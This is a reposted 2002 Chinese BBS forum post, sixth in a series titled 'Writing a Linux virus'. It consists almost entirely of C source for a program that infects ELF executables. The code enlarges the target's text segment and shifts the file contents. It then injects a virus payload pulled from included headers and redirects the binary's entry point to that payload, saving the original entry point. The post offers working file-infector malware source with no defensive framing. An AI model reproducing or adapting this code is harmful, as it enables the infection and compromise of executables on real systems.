荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: jjk (UNIX+C+XML+?? 傻了?), 信区: Linux
标 题: 写一只Linux病毒(6) v0.c(转寄)[转载]
发信站: 荔园晨风BBS站 (Wed Apr 24 18:10:08 2002), 转信
【 以下文字转载自 jjk 的信箱 】
【 原文由 jjk.bbs@apue.dhs.org 所发表 】
发信人: lgx (lgx), 信区: CompSci
标 题: 写一只Linux病毒(6) v0.c
发信站: UNIX编程 (Mon Apr 22 17:08:30 2002) , 转信
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <elf.h>
#include "virus.h"
#include "virus.inc"
int main(int argc,char **argv)
{
int fd,i;
char *file = argv[1];
int data = -1,text = -1;
struct stat st;
Elf32_Ehdr eh;
Elf32_Phdr *ph;
Elf32_Shdr *sh;
unsigned long end_code;
char *buf;
size_t phlen,shlen,buflen;
if ((fd = open(file,O_RDWR,0)) < 0) {
perror("open");
return -1;
}
if (fstat(fd,&st) < 0) {
perror("stat");
goto err;
}
//read eh
if (read(fd,&eh,sizeof(eh)) != sizeof(eh)) {
perror("read");
goto err;
}
//read ph
if (lseek(fd,eh.e_phoff,SEEK_SET) < 0) {
perror("lseek");
goto err;
}
phlen = eh.e_phnum * sizeof(*ph);
ph = alloca(phlen);
if (read(fd,ph,phlen) != phlen) {
perror("read ph");
goto err;
}
//get text and data segmeng index
for (i=0; i<eh.e_phnum; i++) {
if(ph[i].p_type == PT_LOAD) {
if (ph[i].p_offset)
data = i;
else
text = i;
}
}
//sanity check
if (data == -1 || text == -1) {
puts("Can't find text or data segmeng!");
goto err;
}
if ( ph[text].p_vaddr + ph[text].p_filesz + INFECTION_SIZE > ph[data].p_
vaddr) {
puts("No enough space");
goto err;
}
//patch ph
end_code = ph[text].p_offset + ph[text].p_filesz;
ph[text].p_filesz += INFECTION_SIZE;
ph[text].p_memsz += INFECTION_SIZE;
for (i=0; i<eh.e_phnum; i++) {
// printf("%d: %#x, %#x\n",i,ph[i].p_offset,end_code);
if (ph[i].p_offset >= end_code)
ph[i].p_offset += INFECTION_SIZE;
}
//read sh
if (lseek(fd,eh.e_shoff,SEEK_SET) < 0) {
perror("lseek");
goto err;
}
shlen = eh.e_shnum * sizeof(*sh);
sh = alloca(shlen);
if (read(fd,sh,shlen) != shlen) {
perror("read sh");
goto err;
}
//patch sh
for (i=0; i<eh.e_shnum; i++) {
if (sh[i].sh_offset > end_code)
sh[i].sh_offset += INFECTION_SIZE;
}
//write ph
if (lseek(fd,eh.e_phoff,SEEK_SET) < 0) {
perror("lseek");
goto err;
}
if (write(fd,ph,phlen) != phlen) {
perror("write ph");
goto err;
}
//write sh
if (lseek(fd,eh.e_shoff,SEEK_SET) < 0) {
perror("lseek");
goto err;
}
if (write(fd,sh,shlen) != shlen) {
perror("write sh");
goto err;
}
//move
if (lseek(fd,end_code,SEEK_SET) < 0) {
perror("lseek");
goto err;
}
buflen = st.st_size - end_code;
buf = alloca(buflen);
if (read(fd,buf,buflen) != buflen) {
perror("read buf");
goto err;
}
if (lseek(fd,end_code + INFECTION_SIZE,SEEK_SET) < 0) {
perror("lseek");
goto err;
}
if (write(fd,buf,buflen) != buflen) {
perror("write buf");
goto err;
}
//write virus
if (lseek(fd,end_code,SEEK_SET) < 0) {
perror("lseek virus");
goto err;
}
if (write(fd,virus,VLEN) != VLEN) {
perror("write virus");
goto err;
}
//modify virus
if (lseek(fd,end_code + OLD_ENTRY,SEEK_SET) < 0) {
perror("lseek virus");
goto err;
}
if (write(fd,&eh.e_entry,4) != 4) {
perror("write entry");
goto err;
}
//patch eh
if (eh.e_shoff >= end_code)
eh.e_shoff += INFECTION_SIZE;
eh.e_ident[EI_MAG10] = ELFMAG10;
eh.e_entry = ph[text].p_vaddr + ph[text].p_memsz - INFECTION_SIZE;
//write eh
if (lseek(fd,0,SEEK_SET) < 0) {
perror("lseek");
goto err;
}
if (write(fd,&eh,sizeof(eh)) != sizeof(eh)) {
perror("write ph");
goto err;
}
close(fd);
return 0;
err:
close(fd);
return -1;
}
--
※ 来源:.UNIX编程WWW apue.dhs.org. [FROM: 202.108.200.52]
--
※ 转寄:·UNIX编程 apue.dhs.org·[FROM: 210.39.3.50]
--
※ 转载:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.0.146]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店